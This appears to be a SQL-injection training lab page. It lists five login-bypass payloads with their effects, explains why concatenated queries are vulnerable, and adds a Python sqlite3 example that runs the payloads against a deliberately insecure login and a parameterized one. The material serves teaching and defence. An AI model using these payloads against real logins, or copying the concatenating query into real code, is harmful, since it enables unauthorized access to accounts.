The query concatenates your input directly into a SQL string. Your input isn't just
data — it's syntax. Find a way to log in as admin without knowing the password.
Objective
Log in as the admin user without knowing the real password.
Try these payloads (click to copy into username field)

Payload: admin' --
Effect: Comments out the password check entirely. Logs in as admin.

Payload: ' OR 1=1 --
Effect: Always-true condition. Returns the first user (probably admin).

Payload: ' OR username='alice' --
Effect: Log in as a specific named user without their password.

Payload: ' UNION SELECT 1,'fake','admin' --
Effect: Fabricate a row entirely. The login succeeds against fictional data.

Payload: x' OR '1'='1
Effect: Closes the quote, adds an always-true condition, balances quotes naturally.
Why this works
The vulnerable code builds the SQL query by string concatenation:
query = "SELECT id, username, role FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
When you submit the username admin' --, the resulting SQL becomes:
SELECT id, username, role FROM users WHERE username = 'admin' --' AND password = 'anything'
Everything after -- is a comment in SQL. The password check is gone. The query
just says "find a user where username = 'admin'" — and there's exactly one. You're in.
The fix — parameterized queries. The driver sends the query template and the parameter values over the wire as separate items, so the database engine never parses your input as SQL. Toggle Safe mode above and run the same payloads: they become literal usernames containing odd characters, and the lookup fails as it should.
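The following is an added example in Python (using the standard-library sqlite3 module, the same engine the lab runs); it is not the lab's own code. It reproduces the concatenating query from the explanation beside the parameterized version, then runs the payloads listed above against both on a constructed in-memory users table. The table rows, the passwords, and the helper names (build_vulnerable_query, vulnerable_login, safe_login, run_payloads) are assumptions. One caveat it makes visible: because AND binds tighter than OR, the fifth payload (x' OR '1'='1) is only always-true when it sits in the password field, so that is how the example submits it.

```python
import sqlite3

# Constructed sample data for this example (not the lab's real table).
# Plaintext passwords are kept to mirror the lab's query; a real system compares hashes.
USERS = [
    (1, "admin", "s3cret-admin-pw", "admin"),
    (2, "alice", "alice-pw", "user"),
    (3, "bob", "bob-pw", "user"),
]

# The page's payloads, each with the field contents it is submitted alongside.
PAGE_PAYLOADS = [
    ("comment out password check", "admin' --", "anything"),
    ("always-true condition", "' OR 1=1 --", "anything"),
    ("pick a named user", "' OR username='alice' --", "anything"),
    ("fabricate a row with UNION", "' UNION SELECT 1,'fake','admin' --", "anything"),
    # As a bare username, x' OR '1'='1 parses as
    #   username = 'x' OR ('1'='1' AND password = '...')
    # so it still depends on the password. In the password field the OR tail
    # covers the whole WHERE clause, which is the classic always-true form.
    ("quote-balanced always-true (password field)", "nobody", "x' OR '1'='1"),
]


def make_db():
    """Create an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    """The page's concatenating query: whatever the user typed becomes SQL syntax."""
    return (
        "SELECT id, username, role FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def vulnerable_login(conn, username, password):
    """Run the concatenated query. Returns the matched (id, username, role) or None."""
    try:
        return conn.execute(build_vulnerable_query(username, password)).fetchone()
    except sqlite3.Error:
        # Unbalanced quotes make the engine throw. A login endpoint emitting SQL
        # syntax errors is itself a strong detection signal worth alerting on.
        return None


def safe_login(conn, username, password):
    """Parameterized version: the template and the values travel separately,
    so the engine only ever compares the input as a literal string."""
    return conn.execute(
        "SELECT id, username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def run_payloads(conn=None):
    """Run every page payload against both login functions.
    Returns {label: {"vulnerable": row_or_None, "safe": row_or_None}}."""
    conn = conn or make_db()
    return {
        label: {
            "vulnerable": vulnerable_login(conn, user, pw),
            "safe": safe_login(conn, user, pw),
        }
        for label, user, pw in PAGE_PAYLOADS
    }


if __name__ == "__main__":
    for label, outcome in run_payloads().items():
        print(f"{label:45s} vulnerable={outcome['vulnerable']}  safe={outcome['safe']}")
```

Every row in the vulnerable column returns a user while the safe column is None throughout; the parameterized lookup only succeeds when the real credentials (for example admin / s3cret-admin-pw from the constructed table) are supplied.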